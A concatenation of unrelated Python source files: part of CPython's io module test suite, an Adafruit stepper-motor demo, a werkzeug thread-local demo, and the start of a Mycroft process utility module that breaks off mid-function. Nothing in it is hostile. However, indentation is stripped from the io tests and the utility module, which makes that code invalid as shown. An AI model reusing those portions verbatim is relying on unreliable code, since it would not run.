raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
txt.write('abc\xe9\n')
txt.reconfigure(encoding='utf-8')
self.assertEqual(raw.getvalue(), b'abc\xe9\n')
txt.write('d\xe9f\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'abc\xe9\nd\xc3\xa9f\n')
# ascii -> utf-8-sig: ensure that no BOM is written in the middle of
# the file
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('abc\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('d\xe9f\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'abc\nd\xc3\xa9f\n')
def test_reconfigure_write_non_seekable(self):
raw = self.BytesIO()
raw.seekable = lambda: False
raw.seek = None
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('abc\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('d\xe9f\n')
txt.flush()
# If the raw stream is not seekable, there'll be a BOM
self.assertEqual(raw.getvalue(), b'abc\n\xef\xbb\xbfd\xc3\xa9f\n')
def test_reconfigure_defaults(self):
txt = self.TextIOWrapper(self.BytesIO(), 'ascii', 'replace', '\n')
txt.reconfigure(encoding=None)
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'replace')
txt.write('LF\n')
txt.reconfigure(newline='\r\n')
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'replace')
txt.reconfigure(errors='ignore')
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'ignore')
txt.write('CRLF\n')
txt.reconfigure(encoding='utf-8', newline=None)
self.assertEqual(txt.errors, 'strict')
txt.seek(0)
self.assertEqual(txt.read(), 'LF\nCRLF\n')
self.assertEqual(txt.detach().getvalue(), b'LF\nCRLF\r\n')
def test_reconfigure_newline(self):
raw = self.BytesIO(b'CR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline=None)
self.assertEqual(txt.readline(), 'CR\n')
raw = self.BytesIO(b'CR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline='')
self.assertEqual(txt.readline(), 'CR\r')
raw = self.BytesIO(b'CR\rLF\nEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
txt.reconfigure(newline='\n')
self.assertEqual(txt.readline(), 'CR\rLF\n')
raw = self.BytesIO(b'LF\nCR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline='\r')
self.assertEqual(txt.readline(), 'LF\nCR\r')
raw = self.BytesIO(b'CR\rCRLF\r\nEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
txt.reconfigure(newline='\r\n')
self.assertEqual(txt.readline(), 'CR\rCRLF\r\n')
txt = self.TextIOWrapper(self.BytesIO(), 'ascii', newline='\r')
txt.reconfigure(newline=None)
txt.write('linesep\n')
txt.reconfigure(newline='')
txt.write('LF\n')
txt.reconfigure(newline='\n')
txt.write('LF\n')
txt.reconfigure(newline='\r')
txt.write('CR\n')
txt.reconfigure(newline='\r\n')
txt.write('CRLF\n')
expected = 'linesep' + os.linesep + 'LF\nLF\nCR\rCRLF\r\n'
self.assertEqual(txt.detach().getvalue().decode('ascii'), expected)
class MemviewBytesIO(io.BytesIO):
'''A BytesIO object whose read method returns memoryviews
rather than bytes'''
def read1(self, len_):
return _to_memoryview(super().read1(len_))
def read(self, len_):
return _to_memoryview(super().read(len_))
def _to_memoryview(buf):
'''Convert bytes-object *buf* to a non-trivial memoryview'''
arr = array.array('i')
idx = len(buf) - len(buf) % arr.itemsize
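    # round len(buf) down to a whole number of C ints (itemsize is
    # platform-dependent, commonly 4); array.frombytes() only accepts
    # complete items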
arr.frombytes(buf[:idx])
return memoryview(arr)
class CTextIOWrapperTest(TextIOWrapperTest):
io = io
shutdown_error = "RuntimeError: could not find io module state"
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read)
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
with support.check_warnings(('', ResourceWarning)):
rawio = io.FileIO(support.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
class PyTextIOWrapperTest(TextIOWrapperTest):
io = pyio
shutdown_error = "LookupError: unknown encoding: ascii"
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(bytes([b])))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
self.assertRaises(TypeError, decoder.setstate, 42)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
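        # '\u0D00' and '\u0A00' are ordinary characters whose code points
        # merely contain the CR (0x0D) and LF (0x0A) byte values; a decoder
        # that scans raw bytes too eagerly would misclassify them as
        # newlines.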
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertIsNotNone(obj, name)
if name == "open":
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(support.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
with support.check_warnings(('', DeprecationWarning)):
f = self.open(support.TESTFN, "U")
self.assertEqual(f.name, support.TESTFN)
self.assertEqual(f.buffer.name, support.TESTFN)
self.assertEqual(f.buffer.raw.name, support.TESTFN)
self.assertEqual(f.mode, "U")
self.assertEqual(f.buffer.mode, "rb")
self.assertEqual(f.buffer.raw.mode, "rb")
f.close()
f = self.open(support.TESTFN, "w+")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
f = self.open(support.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
self.assertRaises(ValueError, f.read1)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
if hasattr(f, "readinto1"):
self.assertRaises(ValueError, f.readinto1, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.readlines, 1)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
# Various BlockingIOError issues
class C(str):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_abcs(self):
        # Test that the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "w") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
def _check_warn_on_dealloc(self, *args, **kwargs):
f = open(*args, **kwargs)
r = repr(f)
with self.assertWarns(ResourceWarning) as cm:
f = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_warn_on_dealloc(self):
self._check_warn_on_dealloc(support.TESTFN, "wb", buffering=0)
self._check_warn_on_dealloc(support.TESTFN, "wb")
self._check_warn_on_dealloc(support.TESTFN, "w")
def _check_warn_on_dealloc_fd(self, *args, **kwargs):
fds = []
def cleanup_fds():
for fd in fds:
try:
os.close(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
self.addCleanup(cleanup_fds)
r, w = os.pipe()
fds += r, w
self._check_warn_on_dealloc(r, *args, **kwargs)
# When using closefd=False, there's no warning
r, w = os.pipe()
fds += r, w
with support.check_no_resource_warning(self):
open(r, *args, closefd=False, **kwargs)
def test_warn_on_dealloc_fd(self):
self._check_warn_on_dealloc_fd("rb", buffering=0)
self._check_warn_on_dealloc_fd("rb")
self._check_warn_on_dealloc_fd("r")
def test_pickling(self):
# Pickling file objects is forbidden
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+b", "buffering": 0},
]:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
with self.open(support.TESTFN, **kwargs) as f:
self.assertRaises(TypeError, pickle.dumps, f, protocol)
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
@unittest.skipUnless(hasattr(os, 'set_blocking'),
'os.set_blocking() required for this test')
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
os.set_blocking(r, False)
os.set_blocking(w, False)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertEqual(sent, received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
def test_create_fail(self):
        # 'x' mode fails if the file already exists
with self.open(support.TESTFN, 'w'):
pass
self.assertRaises(FileExistsError, self.open, support.TESTFN, 'x')
def test_create_writes(self):
# 'x' mode opens for writing
with self.open(support.TESTFN, 'xb') as f:
f.write(b"spam")
with self.open(support.TESTFN, 'rb') as f:
self.assertEqual(b"spam", f.read())
def test_open_allargs(self):
# there used to be a buffer overflow in the parser for rawmode
self.assertRaises(ValueError, self.open, support.TESTFN, 'rwax+')
class CMiscIOTest(MiscIOTest):
io = io
def test_readinto_buffer_overflow(self):
# Issue #18025
class BadReader(self.io.BufferedIOBase):
def read(self, n=-1):
return b'x' * 10**6
bufio = BadReader()
b = bytearray(2)
self.assertRaises(ValueError, bufio.readinto, b)
def check_daemon_threads_shutdown_deadlock(self, stream_name):
# Issue #23309: deadlocks at shutdown should be avoided when a
# daemon thread and the main thread both write to a file.
code = """if 1:
import sys
import time
import threading
from test.support import SuppressCrashReport
file = sys.{stream_name}
def run():
while True:
file.write('.')
file.flush()
crash = SuppressCrashReport()
crash.__enter__()
# don't call __exit__(): the crash occurs at Python shutdown
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
time.sleep(0.5)
file.write('!')
file.flush()
""".format_map(locals())
res, _ = run_python_until_end("-c", code)
err = res.err.decode()
if res.rc != 0:
# Failure: should be a fatal error
self.assertIn("Fatal Python error: could not acquire lock "
"for <_io.BufferedWriter name='<{stream_name}>'> "
"at interpreter shutdown, possibly due to "
"daemon threads".format_map(locals()),
err)
else:
self.assertFalse(err.strip('.!'))
def test_daemon_threads_shutdown_stdout_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stdout')
def test_daemon_threads_shutdown_stderr_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stderr')
class PyMiscIOTest(MiscIOTest):
io = pyio
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1/0
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
read_results = []
def _read():
if hasattr(signal, 'pthread_sigmask'):
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM])
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
large_data = item * (support.PIPE_MAX_SIZE // len(item) + 1)
try:
wio = self.io.open(w, **fdopen_kwargs)
t.start()
            # Fill the pipe enough that the write will be blocking.
            # It will be interrupted by the timer armed just below.  Since
            # the other thread has read one byte, the low-level write will
            # return with a successful (partial) result rather than an EINTR.
            # The buffered IO layer must check for pending signal
            # handlers, which in this case will invoke alarm_interrupt().
signal.alarm(1)
try:
self.assertRaises(ZeroDivisionError, wio.write, large_data)
finally:
signal.alarm(0)
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
@support.no_tracing
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1/0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
signal.alarm(0)
wio.close()
os.close(r)
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
signal.alarm(0)
rio.close()
os.close(w)
os.close(r)
def test_interrupted_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
def test_interrupted_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r")
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = support.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = support.PIPE_MAX_SIZE
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
error = None
def _read():
try:
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
except BaseException as exc:
nonlocal error
error = exc
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
large_data = item * N
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
written = wio.write(large_data)
self.assertEqual(N, written)
wio.flush()
write_finished = True
t.join()
self.assertIsNone(error)
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
signal.alarm(0)
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
def test_interrupted_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def load_tests(*args):
tests = (CIOTest, PyIOTest, APIMismatchTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead,
SlowFlushRawIO)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = {name : getattr(io, name) for name in all_members}
py_io_ns = {name : getattr(pyio, name) for name in all_members}
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
# Avoid turning open into a bound method.
py_io_ns["open"] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
suite = unittest.TestSuite([unittest.makeSuite(test) for test in tests])
return suite
if __name__ == "__main__":
unittest.main()
|
DualStepperTest.py
|
#!/usr/bin/python
from Adafruit_MotorHAT import Adafruit_MotorHAT, Adafruit_DCMotor, Adafruit_StepperMotor
import time
import atexit
import threading
import random
# create a default object, no changes to I2C address or frequency
mh = Adafruit_MotorHAT()
# create empty threads (these will hold the stepper 1 and 2 threads)
st1 = threading.Thread()
st2 = threading.Thread()
# recommended for auto-disabling motors on shutdown!
def turnOffMotors():
mh.getMotor(1).run(Adafruit_MotorHAT.RELEASE)
mh.getMotor(2).run(Adafruit_MotorHAT.RELEASE)
mh.getMotor(3).run(Adafruit_MotorHAT.RELEASE)
mh.getMotor(4).run(Adafruit_MotorHAT.RELEASE)
atexit.register(turnOffMotors)
myStepper1 = mh.getStepper(200, 1) # 200 steps/rev, motor port #1
myStepper2 = mh.getStepper(200, 2)      # 200 steps/rev, motor port #2
myStepper1.setSpeed(60)                 # 60 RPM
myStepper2.setSpeed(60)                 # 60 RPM
stepstyles = [Adafruit_MotorHAT.SINGLE, Adafruit_MotorHAT.DOUBLE, Adafruit_MotorHAT.INTERLEAVE, Adafruit_MotorHAT.MICROSTEP]
def stepper_worker(stepper, numsteps, direction, style):
#print("Steppin!")
stepper.step(numsteps, direction, style)
#print("Done")
while True:
    if not st1.is_alive():
        randomdir = random.randint(0, 1)
        print("Stepper 1", end=' ')
        if randomdir == 0:
            direction = Adafruit_MotorHAT.FORWARD
            print("forward", end=' ')
        else:
            direction = Adafruit_MotorHAT.BACKWARD
            print("backward", end=' ')
        randomsteps = random.randint(10, 50)
        print("%d steps" % randomsteps)
        st1 = threading.Thread(target=stepper_worker, args=(myStepper1, randomsteps, direction, stepstyles[random.randint(0, 3)],))
        st1.start()

    if not st2.is_alive():
        print("Stepper 2", end=' ')
        randomdir = random.randint(0, 1)
        if randomdir == 0:
            direction = Adafruit_MotorHAT.FORWARD
            print("forward", end=' ')
        else:
            direction = Adafruit_MotorHAT.BACKWARD
            print("backward", end=' ')
        randomsteps = random.randint(10, 50)
        print("%d steps" % randomsteps)
        st2 = threading.Thread(target=stepper_worker, args=(myStepper2, randomsteps, direction, stepstyles[random.randint(0, 3)],))
        st2.start()
|
test_for_process_thread.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2020/2/8 0008 23:58
# @Author : Gpp
# @File : test_for_process_thread.py
import threading, time
# def a_thread():
# print('i am a thread')
# # time.sleep(3)
# print(threading.current_thread().getName())
#
#
# t = threading.Thread(target=a_thread)
# t.start()
# print(threading.current_thread().getName())
# Thread isolation:
# each thread operates on its own copy of the data.
# werkzeug's Local is backed by a dict keyed by thread id,
# e.g. {thread_id_1: {...}}
from werkzeug.local import Local
class A:
b = 1
# my_obj = A()
my_obj = Local()
my_obj.b = 1
def worker():
    # runs in the new thread
time.sleep(2)
my_obj.b = 2
print('in new thread b is:' + str(my_obj.b))
new_t = threading.Thread(target=worker)
new_t.start()
# time.sleep(1)
print('in main thread b is:' + str(my_obj.b))
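# Expected output: the Local gives each thread its own copy of `b`, so the
# main thread still sees the value it set while the worker sees its own:
#   in main thread b is: 1
#   in new thread b is: 2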
|
process_utils.py
|
from collections import namedtuple
from enum import IntEnum
import json
import logging
import signal as sig
import sys
from threading import Event, Thread
from time import sleep
from .log import LOG
def reset_sigint_handler():
"""Reset the sigint handler to the default.
This fixes KeyboardInterrupt not getting raised when started via
start-mycroft.sh
"""
sig.signal(sig.SIGINT, sig.default_int_handler)
def create_daemon(target, args=(), kwargs=None):
"""Helper to quickly create and start a thread with daemon = True"""
t = Thread(target=target, args=args, kwargs=kwargs)
t.daemon = True
t.start()
return t
def wait_for_exit_signal():
"""Blocks until KeyboardInterrupt is received."""
try:
while True:
sleep(100)
except KeyboardInterrupt:
pass
_log_all_bus_messages = False
def bus_logging_status():
global _log_all_bus_messages
return _log_all_bus_messages
def _update_log_level(msg, name):
"""Update log level for process.
Args:
msg (Message): Message sent to trigger the log level change
name (str): Name of the current process
"""
global _log_all_bus_messages
# Respond to requests to adjust the logger settings
lvl = msg["data"].get("level", "").upper()
if lvl in ["CRITICAL", "ERROR", "WARNING", "INFO", "DEBUG"]:
LOG.level = lvl
LOG(name).info("Changing log level to: {}".format(lvl))
try:
logging.getLogger().setLevel(lvl)
logging.getLogger('urllib3').setLevel(lvl)
except Exception:
            pass  # We don't really care if this fails...
else:
LOG(name).info("Invalid level provided: {}".format(lvl))
# Allow enable/disable of messagebus traffic
log_bus = msg["data"].get("bus", None)
if log_bus is not None:
